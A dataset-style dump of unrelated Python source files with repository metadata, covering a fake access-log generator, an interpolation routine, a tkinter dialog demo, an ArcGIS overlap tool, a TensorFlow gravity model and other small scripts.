return "\"http://www.videonet.com/"+sample_url()+"\""
# Randomly pick an HTTP status code for each record
def sample_status():
return random.sample(http_status, 1)[0]
#模拟生成"POST video/006 HTTP1.0"这3个字段的日志
def sample_method_url_status():
return "\""+ random.sample(http_method, 1)[0] + "\t" + sample_url() + "\tHTTP1.0\""
# Randomly generate log records; the count is configurable and defaults to 10
def genNetAccesslog(count = 10, path="OriginalData.txt"):
f = open(path, "w+")
while count >= 1:
query_log = "{ip}\t-\t-\t{local_time}\t{method_url_status}\t{http_status}\t{traffic}\t{url_click}".format(ip=sample_ip(),local_time=sample_time(),method_url_status=sample_method_url_status(),http_status=sample_status(),traffic=sample_traffic(),url_click=sample_url_click())
print(query_log)
f.write(query_log+"\n")
count = count - 1
f.close()
if __name__ == '__main__':
genNetAccesslog(1000)
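    # parsing sketch (added example): the quoted request field produced by
    # sample_method_url_status() itself contains tabs, so a plain "\t" split
    # of a generated line yields 10 tokens, not 8:
    # with open("OriginalData.txt") as f:
    #     for line in f:
    #         parts = line.rstrip("\n").split("\t")
    #         ip, local_time = parts[0], parts[3]
    #         method, url, status, traffic = parts[4].lstrip('"'), parts[5], parts[7], parts[8]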
# print(sample_time()) | [
"[email protected]"
]
| |
e1532be4269f8b27ab7e841cbb3e5b0bc6319f50 | 3fe4fad8082c8102d0700c95375248e5a08d83b7 | /venv/Scripts/easy_install-script.py | 6369f54400da4bdf1782e963bd194216674f451f | []
| no_license | marvelmagnum/lehavre | 8c1cba6a640aa018af8071a446b5ec780c809480 | 9bbbf0c0d253e29aabdb179ddbda917cb23f44a2 | refs/heads/master | 2021-06-14T12:12:17.816414 | 2021-02-24T23:01:01 | 2021-02-24T23:01:01 | 154,767,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | #!"D:\Projects\PyCharm Projects\Le Havre\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
]
| |
db9a51144909d05cfba1634f7a1f9dcf311d3051 | 574d762df232da167fead513b45ef5a60c2de76c | /OperationsA/MyFunctions/Interpolations/newt.py | 98a112b40cc844281f4205f03558358c18bac887 | []
| no_license | yogabbagabb/PythonProjects | e703012952327b15e304756e07640b09a4480054 | 8bc1af491bd63fff78906efe1e8e65d4bbcc8ac1 | refs/heads/master | 2021-01-10T01:10:07.730718 | 2017-02-09T14:05:36 | 2017-02-09T14:05:36 | 45,813,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | '''
Created on Jan 20, 2016
@author: ahanagrawal
'''
'''
A one-dimensional polynomial interpolation scheme that uses Newton's divided
difference approach.
The one-dimensional list passed should contain the evaluations of
f(x) for all x of interest.
'''
def makeCoefficients(a, x):
    # builds the Newton divided-difference table in place: after the loops,
    # a[i] holds the i-th divided-difference coefficient of the polynomial
    length = len(a)
    for k in range(1, length):
        for i in range(k, length):
            a[i] = (a[i] - a[k-1])/(x[i] - x[k-1])
def returnPol(x, func, xD, y = None):
if y == None:
a = [func(x[i]) for i in range (len(x))]
else:
a = y.copy()
makeCoefficients(a, x)
polDegree = len(x) - 1
p = a[polDegree]
for i in range (1, len(x)):
p = a[polDegree - i] + (xD - x[polDegree - i])*p
return p
if __name__ == '__main__':
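    # minimal usage sketch (added example; values illustrative): three samples
    # of f(x) = x**2 determine the quadratic exactly, so P(2.5) should be 6.25
    xs = [1.0, 2.0, 3.0]
    print(returnPol(xs, lambda v: v * v, 2.5))   # expect 6.25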
pass | [
"[email protected]"
]
| |
fd95d5fbefacb5b37e09b549986f43d521ae44a2 | 21fec19cb8f74885cf8b59e7b07d1cd659735f6c | /chapter_8/dlg-custom.py | b1338fb1bb4b149b6737cc31b65a691d7ecc67ba | [
"MIT"
]
| permissive | bimri/programming_python | ec77e875b9393179fdfb6cbc792b3babbdf7efbe | ba52ccd18b9b4e6c5387bf4032f381ae816b5e77 | refs/heads/master | 2023-09-02T12:21:11.898011 | 2021-10-26T22:32:34 | 2021-10-26T22:32:34 | 394,783,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | "Custom Dialogs"
'''
Custom dialogs support arbitrary interfaces, but they are also the most complicated to
program. Even so, there’s not much to it—simply create a pop-up window as a
Toplevel with attached widgets, and arrange a callback handler to fetch user inputs
entered in the dialog (if any) and to destroy the window.
'''
import sys
from tkinter import *
makemodal = (len(sys.argv) > 1)
def dialog():
win = Toplevel() # make a new window
Label(win, text='Hard drive reformatted!').pack() # add a few widgets
Button(win, text='OK', command=win.destroy).pack() # set destroy callback
if makemodal:
win.focus_set() # take over input focus,
win.grab_set() # disable other windows while I'm open,
        win.wait_window()              # and wait here until win destroyed
print('dialog exit') # else returns right away
root = Tk()
Button(root, text='popup', command=dialog).pack()
root.mainloop()
'''
Because dialogs are nonmodal in this mode, the
root window remains active after a dialog is popped up. In fact, nonmodal dialogs never
block other windows, so you can keep pressing the root’s button to generate as many
copies of the pop-up window as will fit on your screen.
'''
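# a minimal sketch (added example, not from the original text) of a modal
# dialog that returns a value: input is collected into a mutable container,
# wait_window() blocks until the dialog is destroyed, then the caller reads
# the result
def ask_string(parent, prompt):
    win = Toplevel(parent)
    Label(win, text=prompt).pack()
    entry = Entry(win)
    entry.pack()
    result = []
    def on_ok():
        result.append(entry.get())
        win.destroy()
    Button(win, text='OK', command=on_ok).pack()
    win.focus_set()                    # take over input focus,
    win.grab_set()                     # make the dialog modal,
    win.wait_window()                  # and block until it is destroyed
    return result[0] if result else None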
| [
"[email protected]"
]
| |
004458cf3c40d7c96286fba9e9405e34a77ca100 | 94a3acf9fd3ab4406787929d6266076191534455 | /Exams/Midterm/Midterm Submission/Question1.py | c5ef6b123609d265e2a5216543729f9c9b777928 | []
| no_license | brandon-rowe/Python | fec4c3fec2fb9a6b37ead3db9fc2a3c3173be194 | c405cefc02a25db4d3fdf3643383a47097a3e5ea | refs/heads/master | 2023-05-25T16:32:46.829690 | 2023-04-06T01:49:23 | 2023-04-06T01:49:23 | 171,032,591 | 0 | 2 | null | 2023-05-23T04:12:39 | 2019-02-16T17:42:59 | HTML | UTF-8 | Python | false | false | 459 | py | # Change Counter
def main():
_change = int(input("Please enter an amount between 0-99: "))
_quarters = _change//25
_change = _change%25
_dimes = _change//10
_change = _change%10
_nickels = _change//5
_change = _change%5
_pennies = _change//1
print(_quarters,": Quarters")
print(_dimes,": Dimes")
print(_nickels,": Nickels")
print(_pennies,": Pennies")
main()
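# equivalent sketch (added note) using divmod, which returns the quotient and
# remainder in one step:
# quarters, rem = divmod(change, 25)
# dimes, rem = divmod(rem, 10)
# nickels, pennies = divmod(rem, 5)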
| [
"[email protected]"
]
| |
965030f98fd33df2b8b068d3b56296d7ed67e5ce | 4fe81fa43d484334fd4045ab854c60935d423c07 | /auth/resources/list_all_users.py | d4aacec33dad4640ab1434ad7c84c076e3fb9cfb | []
| no_license | krish9191/Auth_process | 7fdf5bf2504f2cb8bbd6266f3d542e2f3206a711 | cf35e49b6e43f8ac13e487aad3df795ee1ccb89b | refs/heads/master | 2023-06-30T03:15:28.962742 | 2021-08-08T09:10:25 | 2021-08-08T09:10:25 | 361,009,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from auth.manager import list_users
from flask_restful import Resource
from decorators import admin_required
class UsersList(Resource):
@classmethod
@admin_required
def get(cls):
return list_users() | [
"[email protected]"
]
| |
bf15a0134c6b3e379d9901b3901eb79bfb8cefa4 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/9/xm5.py | 38c66cb97e0801b2ac4684ce92a27b4b9fd0b4e8 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'xm5':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
a07d58182c489431e554b84e7aaaa15160ba50a2 | ba2599d5106039c546d818dd1c11ec05213edf39 | /booleanoverlap.py | 1508bfe2be685474b20313fbdddcb06c0efc7692 | []
| no_license | eliza-wallace/ArcGIS_Tools | 3a96576a56cb94829f4a88bf8eb435fa915534b0 | 4f4d99752793de047ff1111fa83ef59c6fde297c | refs/heads/master | 2021-04-15T03:44:45.392693 | 2017-06-21T19:57:02 | 2017-06-21T19:57:02 | 94,559,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 20 16:26:57 2017
Boolean Overlap Tool
@author: Eliza Wallace, [email protected]
"""
import arcpy
import sys
points = arcpy.GetParameterAsText(0)
polygons = arcpy.GetParameterAsText(1)
newfield = arcpy.GetParameterAsText(2)
# function that appends a numeric suffix to a dataset name if it already exists
def AutoName(raster):
raster = raster.replace(' ','') # removes spaces from layer name for ESRI GRID format
checkraster = arcpy.Exists(raster) # checks to see if the raster already exists
count = 2
newname = raster
while checkraster == True: # if the raster already exists, adds a suffix to the end and checks again
newname = raster + str(count)
count += 1
checkraster = arcpy.Exists(newname)
return newname
# function that adds a short-integer field to a point feature class indicating
# whether or not each point overlaps a polygon in another feature class
def booleanoverlap(points, polygons, newfield):
#copy polygons to new feature class
#polycopy = "polygonscopy"
polycopy = AutoName("polygonscopy")
arcpy.CopyFeatures_management(polygons,polycopy)
arcpy.AddField_management(polycopy,newfield,"SHORT")
arcpy.CalculateField_management(polycopy,newfield,"1","PYTHON")
joindata = AutoName("joindata")
arcpy.SpatialJoin_analysis(points, polycopy, joindata)
arcpy.JoinField_management(points, "OBJECTID", joindata, "OBJECTID", newfield)
    arcpy.Delete_management(joindata)   # Delete_management takes one dataset at a time
    arcpy.Delete_management(polycopy)
try:
booleanoverlap(points, polygons, newfield)
except Exception:
e = sys.exc_info()[1]
print(e.args[0])
arcpy.AddError(e.args[0])
| [
"[email protected]"
]
| |
d06381214dffd354dcc274beac64acf7506eacb1 | 5cdac410e331d90aba43cb84f6c2e5df27e45067 | /20191024_01.py | 5925477a286ab0c96bf0274f7e156166944a04b2 | []
| no_license | IngvarRed/circle_python_2019 | 2aef1c4a48636eda74dd66ff53434a3aa2ba615d | 4056536dee250a961ef6c4b18564c3088c5e990c | refs/heads/master | 2020-08-05T16:53:54.660536 | 2020-01-10T00:01:51 | 2020-01-10T00:01:51 | 212,623,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | # 2d index
matrix = []
for i in range(5):
matriy = []
for j in range(5):
matriy.append(i + j)
matrix.append(matriy)
print(matrix)
print(matrix[2][4])
| [
"[email protected]"
]
| |
7987d0828fe16ad0f74645f891bb153c87757932 | 685b6ca5665fd052c02afebdbfab726de5be2c73 | /models/TFSingleOrigin.py | 3c8fe2b322ff75cb7e555b7c0e5ef4705227fca5 | [
"MIT"
]
| permissive | maptube/UMaaS | f37c50128fd2bb21a4dd563316aa7e255adcc04b | 0758d8352213f332546d728f3eb02411c16c97ac | refs/heads/master | 2021-10-12T17:16:46.266806 | 2021-10-08T15:58:29 | 2021-10-08T15:58:29 | 158,449,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,234 | py | import tensorflow as tf
#import numpy as np
from math import exp, fabs
import time
"""
Tensorflow implementation of single destination constrained gravity model
How about PyTorch or Keras?
"""
class TFSingleOrigin:
###############################################################################
def __init__(self,N):
self.N=N #7201 #number of zones - needed to be preset for the TF code (i.e. before matrix was loaded to give us N) - TODO: use TF adaptive sizes
self.numModes=3
self.TObs=[] #Data input to model list of NDArray
self.Cij=[] #cost matrix for zones in TObs
self.isUsingConstraints = False
self.constraints = [] #1 or 0 to indicate constraints for zones matching TObs - this applies to all modes
self.TPred=[] #this is the output
self.B=[] #this is the constraints output vector - this applies to all modes
self.Beta=[] #Beta values for three modes - this is also output
#create a graph for TensorFlow to calculate the CBar value
self.tfTij = tf.placeholder(tf.float32, shape=(self.N,self.N), name='Tij') #input tensor 1 #hack! need to have the matrix dimension here!
self.tfCij = tf.placeholder(tf.float32, shape=(self.N,self.N), name='Cij') #input tensor 2
self.tfCBar = self.buildTFGraphCBar()
#create Oi graph
self.tfOi = self.buildTFGraphOi()
#create Dj graph
self.tfDj = self.buildTFGraphDj()
#create other operations here...
self.tfBeta = tf.Variable(1.0, name='beta')
self.tfRunModel = self.buildTFGraphRunModel()
###############################################################################
"""
Build TensorFlow graph to calcualate CBar
@param N order of matrix i.e. 7201
"""
def buildTFGraphCBar(self):
#TensorFlow compute graph creation here
#define tensors
#tfTij = tf.placeholder(tf.float32, shape=(N,N), name='Tij')
#tfCij = tf.placeholder(tf.float32, shape=(N,N), name='Cij')
#build graph
CNumerator = tf.reduce_sum(tf.multiply(self.tfTij,self.tfCij))
CDenominator = tf.reduce_sum(self.tfTij)
tfCBar = tf.divide(CNumerator,CDenominator,name='CBar')
#tf.math.multiply
#tf.math.exp
#this is how you would run it
#with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
# print(sess.run(tfCBar, {tfTij: Tij, tfCij: Cij}))
return tfCBar #note returning operation graph, NOT value
###############################################################################
"""
Build TensorFlow graph to calculate Oi
"""
def buildTFGraphOi(self):
tfOi = tf.reduce_sum(self.tfTij,axis=1)
return tfOi
###############################################################################
"""
Build TensorFlow graph to calculate Dj
"""
def buildTFGraphDj(self):
tfDj = tf.reduce_sum(self.tfTij,axis=0)
return tfDj
###############################################################################
#todo: Build TensorFlow graph to calculate main model equation: B*Oi*Dj*exp(beta*Cij)/sigma etc
"""
"""
def buildTFGraphRunModel(self):
#TODO: here!!!!
#[Oi 1 x n] [Dj n x 1]
#formula: Tij=Oi * Dj * exp(-beta * Cij)/(sumj Dj * exp(-beta * Cij))
tfBalance = tf.reciprocal(tf.matmul(tf.reshape(self.tfDj, shape=(1,self.N)), tf.exp(tf.negative(self.tfBeta) * self.tfCij)))
#this is the real model
tfRunModel = tf.multiply(
tfBalance,
tf.matmul(tf.reshape(self.tfOi, shape=(self.N,1)),tf.reshape(self.tfDj,shape=(1,self.N))) * tf.exp(tf.negative(self.tfBeta) * self.tfCij),
name='result'
)
#this is testing
#tfRunModel = tf.matmul(tf.reshape(self.tfOi, shape=(7201,1)),tf.reshape(self.tfDj,shape=(1,7201))) * tf.exp(tf.negative(self.tfBeta) * self.tfCij)
return tfRunModel
###############################################################################
"""
calculateCBar
    Mean trip cost calculation
    @param name="Tij" NDArray
    @param name="Cij" NDArray
@returns float
"""
def calculateCBar(self,Tij,Cij):
#(M, N) = np.shape(Tij)
#CNumerator = 0.0
#CDenominator = 0.0
#for i in range(0,N):
# for j in range(0,N):
# CNumerator += Tij[i, j] * cij[i, j]
# CDenominator += Tij[i, j]
#CBar = CNumerator / CDenominator
#print("CBar=",CBar)
#faster
#CNumerator2 = np.sum(Tij*Cij)
#CDenominator2 = np.sum(Tij)
#CBar2=CNumerator2/CDenominator2
#print("CBar2=",CBar2)
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
CBar = sess.run(self.tfCBar, {self.tfTij: Tij, self.tfCij: Cij})
return CBar
###############################################################################
def calculateOi(self,Tij):
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
Oi = sess.run(self.tfOi, {self.tfTij: Tij})
return Oi
###############################################################################
def calculateDj(self,Tij):
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
Dj = sess.run(self.tfDj, {self.tfTij: Tij})
return Dj
###############################################################################
def runModel(self,Tij,Cij,Beta):
#TensorFlow
#run Tij = Ai * Oi * Dj * exp(-Beta * Cij) where Ai = 1/sumj Dj*exp(-Beta * Cij)
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
writer = tf.summary.FileWriter("log/TFSingleDest", sess.graph)
sess.run(tf.global_variables_initializer())
starttime = time.time()
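            #timing loop: runs the model graph 1000 times, feeding each prediction back in as the next Tij input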
for i in range(0,1000):
Tij = sess.run(self.tfRunModel, {self.tfTij: Tij, self.tfCij: Cij, self.tfBeta: Beta})
finishtime = time.time()
writer.close()
print("TFSingleDest: runModel ",finishtime-starttime," seconds")
return Tij
###############################################################################
def debugWriteModelGraph(self,Tij,Cij,Beta):
with tf.Session() as sess:
writer = tf.summary.FileWriter("log/TFSingleOrigin", sess.graph)
sess.run(tf.global_variables_initializer())
Tij = sess.run(self.tfRunModel, {self.tfTij: Tij, self.tfCij: Cij, self.tfBeta: Beta})
writer.close()
g = tf.get_default_graph()
print(g.get_operations())
###############################################################################
"""
    Test run of the equation Tij = Oi*Dj*exp(-Beta*Cij)/denom
This is a slow implementation as a test of correct functionality. This allows
breaking up of the TensorFlow code for verification.
"""
def debugRunModel(self,Oi,Dj,Tij,Cij,Beta):
(M,N) = np.shape(Tij)
TPred = np.zeros(N*N).reshape(N, N)
for i in range(0,N):
#denominator calculation which is sum of all modes
denom = 0.0 #double
for j in range(0,N):
denom += Dj[j] * exp(-Beta * Cij[i, j])
#end for j
#print("denom=",denom)
#numerator calculation
for j in range(0,N):
TPred[i, j] = Oi[i] * Dj[j] * exp(-Beta * Cij[i, j]) / denom
#print("Tijk[0,0]=",Tij[i,0])
#end for i
return TPred
###############################################################################
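###############################################################################
#Minimal usage sketch (an illustrative addition, not the original repo's driver
#code): exercises the class on small synthetic matrices purely to show the
#calling convention. N, the random inputs and Beta=1.0 are assumptions.
if __name__ == "__main__":
    N = 10
    model = TFSingleOrigin(N)
    Tij = np.random.rand(N, N).astype(np.float32)   #synthetic observed trip matrix
    Cij = np.random.rand(N, N).astype(np.float32)   #synthetic cost matrix
    print("CBar =", model.calculateCBar(Tij, Cij))
    Oi = model.calculateOi(Tij)
    Dj = model.calculateDj(Tij)
    TPred = model.debugRunModel(Oi, Dj, Tij, Cij, 1.0)
    #origin constraint check: each row of TPred should sum to the corresponding Oi
    print("row sums match Oi:", np.allclose(np.sum(TPred, axis=1), Oi))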
| [
"[email protected]"
]
|